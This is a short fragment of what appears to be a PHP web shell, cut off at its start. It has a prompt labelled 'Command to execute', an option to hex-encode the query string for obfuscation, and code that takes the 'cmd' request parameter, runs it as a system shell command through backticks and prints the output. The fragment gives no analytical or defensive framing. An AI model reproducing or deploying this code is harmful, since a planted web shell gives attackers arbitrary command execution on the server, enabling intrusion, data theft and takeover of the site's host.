Check this to obfuscate the query string with hex encoding.
Command to execute:
"); $to=array("<",">"); $command=urldecode($_REQUEST['cmd']); $output=str_replace($from,$to,`$command`); echo "# $command
\n
$output
\n"; } exit; ?>